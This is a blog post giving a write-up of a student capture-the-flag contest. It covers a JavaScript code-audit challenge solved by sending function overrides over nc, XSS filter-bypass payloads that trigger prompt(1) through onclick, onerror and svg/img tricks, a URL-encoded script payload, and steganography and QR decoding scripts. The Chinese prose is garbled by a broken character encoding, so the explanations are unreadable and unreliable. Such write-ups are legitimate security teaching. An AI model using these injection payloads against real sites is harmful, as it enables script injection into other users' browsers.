LoRexxar's Blog

hctf_game_week3_writeup

2016/02/29

鍋囨湡闅惧緱鏈夋椂闂寸┖闂蹭笅鏉ワ紝灏卞拰鍗忎細鐨勫皬浼欎即缁勭粐浜嗕竴娆℃瘮杈冪畝鍗曠殑ctf姣旇禌閽堝瀛︽牎鐨勫寮熷濡逛滑锛岃繖閲屽氨璐翠笂姣忎竴娆$殑writeup锛屼互渚涙暣鐞嗗涔犵敤銆

WEB

浠g爜瀹¤:Javascript榄旀硶甯 POINT: 200

鏈棰樿В璇︽儏
棰樼洰ID锛 66
棰樼洰鎻忚堪锛 浠g爜瀹¤:Javascript榄旀硶甯 nc 114.215.155.190 10009
Hint: 婧愮爜锛堝鏋滀綘鎯抽粦鐩掔殑璇濆彲浠ュ拷鐣ワ級锛https://gist.github.com/iAklis/2770f07540b6ddfc1d66

璇村疄璇濈殑璇濇垜鎰熻棰樼洰闈炲父鐨勯毦锛屽紑濮嬭瘯楠屼簡寰堜箙閮藉け璐ヤ簡锛屽悗鏉ラ棶浜哸k鑰佸徃鏈烘墠鐭ラ亾鏄庝箞鍋氱殑銆
棣栧厛瀵逛簬js鐨勫ぇ娈典唬鐮侊紝鍒嗘瀽璧锋潵璋侀兘浼氭劅瑙夊埌寰堥夯鐑︺

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
function (urandom) {
function step1(){ //2028 done
var a = new Date();
var b = Number(a.getFullYear());
t = 0;
for (var i = 0; i < b.length; i++ ){
t += parseInt();
}
var c = String(a.getFullYear());
for (var i = 0; i < c.length; i++ ){
t += b % 10;
b = b / 10;
}
var b = Number(a.getFullYear());
if (!(b%400===0 || b%100!=0 && b%4===0))
return false;
if (!(t > 11 & t < 27))
return false;
return true;
}
function step2() { //a.concat
var a = Array.apply(null, new Array(Math.floor(Math.random() * 20 + 12) + 10)).map(function () {return Math.random() * 0x10000;});
var b = urandom(a.length);
if (!Array.isArray(b)) {
return false;
}
if (b.length < a.length) {
for (var i = 0, n = a.length - b.length; i < n; i++) {
delete b[b.length];
b[b.length] = [Math.random() * 0x10000];
}
} else if (b.length > a.length) {
for (var i = 0, n = b.length - a.length; i < n; i++)
Array.prototype.pop.apply(b);
}
for (var i = 0, n = b.length; i < n; i++) {
if (a[i] != b[i]) {
return false;
}
}
return true;
}
function step3() {
var a = Array.apply(null, new Array((urandom() % 20 + 12) + 10)).map(function () {return urandom() % 0x10000;});
var b = urandom(a.length);
if (!Array.isArray(b)) {
return false;
}
if (b.length < a.length) {
for (var i = 0, n = a.length - b.length; i < n; i++) {
delete b[b.length];
b[b.length] = [Math.random() * 0x10000];
}
} else if (b.length > a.length) {
for (var i = 0, n = b.length - a.length; i < n; i++)
Array.prototype.pop.apply(b);
}
for (var i = 0, n = b.length; i < n; i++) {
if (a[i] != b[i]) {
return false;
}
}
return true;
}
if (!step1())
return "Thinkphp!";
if (!step2())
return "Yiiii~";
if (!step3())
return "Laravel!";
return flag;

鑰屽浜庤繖鏍风殑js瀹¤棰樼洰鏉ヨ锛宖irefox firebug鐨勬帶鍒跺彴缁濆鏄涓绁炲櫒锛屼緥濡傛垜浠彲浠ュ厛鎶妔tep1锛堬級澶嶅埗涓嬫潵锛岀劧鍚庢妸鍑芥暟鍘绘帀锛屾妸return鏀逛负鏈夋剰涔夌殑alert锛岀劧鍚庡叾涓姝ョ殑鍙橀噺閫氳繃console.log鎴栬卍ocument.write鐨勬柟娉曡緭鍑哄鏉ユ祴璇曘
灏辨瘮濡傚湪鎴戞渶寮濮嬬殑娴嬭瘯涓紝2028骞村氨鍙互杩囩涓姝ワ紝浣嗘槸瀹為檯棰樼洰鍦ㄦ湇鍔″櫒鐜涓嬶紝鍙垜浠讳笉鑳界瓑鍒2028骞存墠鍋氶锛屾墍浠ヨ繖閲屽叾瀹炴槸閫氳繃閲嶅啓鍑芥暟鐨勬柟寮忔潵杩囧垽鏂殑銆

payload锛
echo 'Array.apply=function(){return [];};function urandom(){return [];}function Date(){this.getFullYear=function(){return 1924;}}'| nc aklis.yun 10009
浠旂粏鐮旂┒涓嬪惂銆

WEB浠0寮濮嬩箣xss challenge2 POINT: 150

鏈棰樿В璇︽儏
棰樼洰ID锛 58
棰樼洰鎻忚堪锛 http://115.28.78.16/xss/xss2/index.php
1銆佹垚鍔熸墽琛宲rompt(1).
2銆乸ayload蹇呴』瀵逛笅杩版祻瑙堝櫒鏈夋晥锛 Chrome(鏈鏂扮増) - Firefox(鏈鏂扮増)
3銆佸皢鏈夋晥payload鍙戦佺粰qq578168406(LoRexxar)鎴栬呭ぇ椋炲鑾峰彇flag

杩欓亾棰樼殑鍘熼涔熸槸prompt(1)鎸戞垬璧涚殑棰樼洰锛屾湰鏉ョ殑payload鏄繖鏍风殑锛

1
2
"type=image src onerror
="prompt(1)

浣嗘槸涓婃鏈変汉璇存垜鍑轰簡鍘熼锛屾湁蹇冧汉涓鎼滃氨鑳芥壘鍒皃ayload锛屾墍浠ユ垜灏辨妸鍘熺瓟妗堜腑缁欒繃婊や簡锛岀粨鏋滄病鎯冲埌娌″姙娉曞湪涓嶄氦鎴风殑鎯呭喌涓嬪畬鎴愬脊绐楋紝浜庢槸鎴戞湰浠ヤ负鑰冪殑鏂瑰悜涓嶅彉锛屾垜杩欓噷鐨刾ayload鏄繖鏍风殑锛

1
2
3
"type="button
" onclick
="prompt(1)

缁撴灉鍏跺疄鏀规垚onclick鐨勮瘽锛屾棤璁烘槸浠涔坱ype閮芥棤鎵璋撲簡锛岃繖鏍峰叾瀹炲皯浜嗕竴涓冪偣锛屼笉杩囨棦鐒跺凡缁忛檷浜嗛毦搴﹀氨绠椾簡锛屽彲鎯滆繕鏄彧鏈2涓汉缁欐垜鎻愪氦浜唒ayload锛屾槸杩欐牱鐨

1
2
" onclick
="prompt(1)

浠旂粏闃呰婧愮爜鍙戠幇2鐐癸細
1銆侀鍏堟槸杩囨护锛屾妸onxxxx=杩欐牱鐨勬浛鎹负_,杩欓噷鐢ㄤ竴涓洖杞︾粫杩囥
2銆佸叾娆℃槸绗簩鐐癸紝灏辨槸鍚庨潰鐨則ype涓嶅彲浠ヨ鐩栧墠闈㈢殑锛屾墍浠ュ彲浠ユ妸type=image銆傦紙褰撶劧鐢变簬澶辫锛岃繖涓凡缁忎笉閲嶈浜嗭級

WEB浠0寮濮嬩箣xss challenge3 POINT: 200

鏈棰樿В璇︽儏
棰樼洰ID锛 59
棰樼洰鎻忚堪锛 http://115.28.78.16/xss/xss3/index.php
1銆佹垚鍔熸墽琛宲rompt(1).
2銆乸ayload涓嶉渶瑕佺敤鎴蜂氦浜
3銆乸ayload蹇呴』瀵逛笅杩版祻瑙堝櫒鏈夋晥锛 Chrome(鏈鏂扮増) - Firefox(鏈鏂扮増)
4銆佸皢鏈夋晥payload鍙戦佺粰qq578168406(LoRexxar)鎴栬呭ぇ椋炲鑾峰彇flag

棰樼洰鏄潵鑷猵rompt(1)鎸戞垬璧涚殑level7锛屼粩缁嗛槄璇绘簮鐮佸悗鍙戠幇锛岄鐩殑鍘熸剰鏄牴鎹#鍒嗙锛屾瘡涓閮ㄥ垎璧嬬粰涓涓猼itle锛屽鏋滆秴杩12瀛楃锛屽垯闇瑕佹埅鍙栧墠12涓紝杩欓噷浣跨敤鐨勬槸js娉ㄩ噴锛屼娇浠g爜杩炶捣鏉ャ

绋嶅井娴嬭瘯涓涓嬶紝鍙戠幇娉ㄩ噴涔嬮棿鏄細鍑虹幇绌烘牸鐨勶紝script,on+xxx,prompt杩欐牱鐨勪腑闂村嚭鐜扮┖鏍间細鏃犳晥锛屾墍浠cript杩欐牱鐨勫姞payload浼氭孩鍑12涓鍙凤紝鎵浠ュ師棰樼殑payload鏄細

1
"><svg/a=#"onload='/*#*/prompt(1)'

杩欐牱灏卞舰鎴

1
2
3
<p class="comment" title=""><svg/a="></p>
<p class="comment" title=""onload='/*"></p>
<p class="comment" title="*/prompt(1)'"></p>

杩欓噷涓嶈兘浣跨敤/**/闂悎绗竴琛屽拰绗簩琛屼箣闂寸殑涓滆タ锛屾槸鍥犱负SVG鏂囦欢涓彲浠ラ氳繃浠绘剰鍏冪礌鐨刼nload浜嬩欢鎵цJavascript,涓斾笉闇瑕佺敤鎴蜂氦浜掋
浣嗘槸svg琚垜杩囨护浜嗭紝鍏跺疄img鐨刼nerror灞炴у拰svg鑳借捣鍒扮浉鍚岀殑浣滅敤锛屼簬鏄垜鐨刾ayload鏄:

1
"><img/src=#"onerror='/*#*/prompt(1)'

鎴愬姛寮圭獥銆

misc

MISC 椹鹃┒鎶鏈鐩簲 POINT: 250 DONE

鏈棰樿В璇︽儏
棰樼洰ID锛 40
棰樼洰鎻忚堪锛 娉ㄦ剰璺喌锛岀湅浠旂粏鐐瑰晩锛佸皬浼欏瓙浠紒鍒硅溅鍟婂埞杞︼紒锛侊紒 璁╂垜涓嬭溅锛佽鎴戜笅杞︼紒锛
Hint: 鏆傛棤HINT

绉戠洰浜旂殑鍏ュ彛鍦ㄧ鐩洓鐨勪笅杞介噷闈紝鎵撳紑鍙戠幇鏄竴寮犲浘鐗囷紝杩欓鐪熺殑鏄崱浜嗗緢涔呭緢涔咃紝鍚庢潵鐪嬩簡spine鐨剋riteup鎵嶆槑鐧芥槸lsb闅愬啓锛岀敤stegsolves鎵撳紑鍥剧墖锛岀偣寮data extract锛屽嬀涓妑gb鐨0锛屽彲浠ョ湅鍒颁竴涓瞓ase64缂栫爜杩囩殑涓滆タ锛屾嬁鍘昏В瑙g湅鍙戠幇涓嶅彲瑙侊紝鍘婚棶浜嗚佸徃鏈虹煡閬撴槸zlib鍔犲瘑锛岄偅涔堬紝寮濮嬪啓浠g爜鍚с

1
2
3
4
5
6
7
8
9
import zlib
import binascii
import base64
aa = "eF6NkEFWw0AMQ8+SGyTHYAVXgL7SrrrgwYY+7k78JTmGBY9J05mxJVnK9fT+ej+/XdaPz+v59vJ8uyzL8vT4sK/98LX9Y61a27buv3r1z41FZ197IwhA1UpHhZThBA4Uah9MdKGavyCS1eA0G2IvodnY4bJ9g/j54DrqlUm+pDEbI0B5ryttXPDyTbLQGRmFELE51ihL1mSPVNBoBsTue06DH1MQuHi3y2KWhOQ0YcLohqY5niYGogCwaYtWlbL6hTFOI5vjLBgjipaFVYPdjZHEVQI4Q9uIKWdoRLAWhKunIDHhU11lHX2qh9KRmlYA8kLBdZlqa8WzDpIzeH08vgl1/VGrR1W4gtTB47TBlkZPzzgrD2osas70YuPWF64FE0cpbHIk6oHxUgnlXlGkLqMEJZFTWa+2pAH5x/oGmlvynQ=="
aa = base64.b64decode(aa)
#print base64.b64encode(aa)
result = binascii.hexlify(zlib.decompress(aa))
result = result.decode('hex')
print result

瑙e嚭鏉ユ椂31瀛楃涓诧紝涓鐪肩湅绌挎槸瑕佸啀瑙d竴娆ex锛屼簬鏄痝et flag锛

MISC 椹鹃┒鎶鏈鐩叚 POINT: 100 DONE

鏈棰樿В璇︽儏
棰樼洰ID锛 41
棰樼洰鎻忚堪锛 杩囦簡杩欎竴鍏筹紝灏卞張鏈変竴浣嶆柊鍙告満璇炵敓浜嗭紒

绉戠洰绯诲垪鍒颁簡杩欓噷灏卞緢绠鍗曚簡锛岀湅鍒颁竴澶у爢01瀛楃涓诧紝鐪嬩笅闀垮害鏄1225锛岄櫎涓嶅紑8锛岃兘寮鏍瑰彿锛岄偅灏卞緢娓呮浜嗐
瑕佹妸01杞寲涓轰簩缁寸爜浜嗭紝閭d箞寮濮嬪啓浠g爜鍚с

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from PIL import Image
pic = Image.new("RGB",(35, 35))
aa = "1111111111111111111111111111111111110000000110110011010011001100000001101111101011001101101000001011111011010001010000000110010110010100010110100010110001011101000100101000101101000101011111110111010001010001011011111010010100011101011110111110110000000101010101010101010100000001111111111001101011010100111111111111001011001101111000011100010001001111111111111001100110100010100100101111010001000110000110101101111011011001111110111101011111010110110101111101010111110110110111101000111001101000011010000101000101110010101011001111000011010000110010001101001111011111010010110100000001110011011110111100100010100000010001000111011001000111001111010111010011111111111000000000111100010111111100100001101001011111010100101100011011110011100111001000010010110101001010111111010101010100100001111110000111001100100000101000010100101101110011011101000101000011001010001001000100110110110111101100010100110000011111111111111011010000010000101110101011000000010110100010111001010100101110111110111001000101100010111011011101000101100100100100001100000111111010001010111000010011001000100110110100010110000100010100110011000101101111101001101100011101001000111111000000010111011010100001010001101111111111111111111111111111111111111"
i=0
for y in range (0,35):
for x in range(0,35):
if(aa[i] == '0'):
pic.putpixel([x,y],(0, 0, 0))
else:
pic.putpixel([x,y],(255,255,255))
i = i+1
pic.show()
pic.save("flag.png")

鎵竴鎵笂杞︺

pentest

lightless&aklis鐨勬笚閫忔暀瀹-4 POINT: 100 DONE

鏈棰樿В璇︽儏
棰樼洰ID锛 65
棰樼洰鎻忚堪锛 http://120.27.53.238/pentest/04/encodeanddecode.php
Hint: 鏆傛棤HINT

鎴戣寰楄姹傛瘮杈冩竻鏅帮紝鏈変竴涓悊瑙d笂鐨勫潙鏈夌偣鍎块夯鐑︼紝灏辨槸姣忔鍙戦佺殑璇锋眰浼氳嚜鍔ㄦ湁涓娆rl鐨刣ecode锛屾墍浠ュ鏋滆鍙戦佹寚瀹氱殑涓滆タ锛屼綘闇瑕佸厛鎸夌収鎵闇缂栫爜涓娆★紝鍐嶅叏閮╱rl鐨別ncode锛岃繖鏍锋湇鍔″櫒浼氬彈鍒版纭殑璇锋眰銆
鏀跺埌杩欐牱鐨勪笢瑗垮氨get flag浜嗭紝澶氳瘯璇曠湅锛

1
2
string(52) "&lt;script&gt;x=alert;x('lightless');&lt;/script&gt;"
string(62) "%3Cscript%3Ex%3Dalert%3Bx%28%27lightless%27%29%3B%3C/script%3E"

CATALOG
  1. 1. WEB
    1. 1.1. 浠g爜瀹¤:Javascript榄旀硶甯 POINT: 200
    2. 1.2. WEB浠0寮濮嬩箣xss challenge2 POINT: 150
    3. 1.3. WEB浠0寮濮嬩箣xss challenge3 POINT: 200
  2. 2. misc
    1. 2.1. MISC 椹鹃┒鎶鏈鐩簲 POINT: 250 DONE
    2. 2.2. MISC 椹鹃┒鎶鏈鐩叚 POINT: 100 DONE
  3. 3. pentest
    1. 3.1. lightless&aklis鐨勬笚閫忔暀瀹-4 POINT: 100 DONE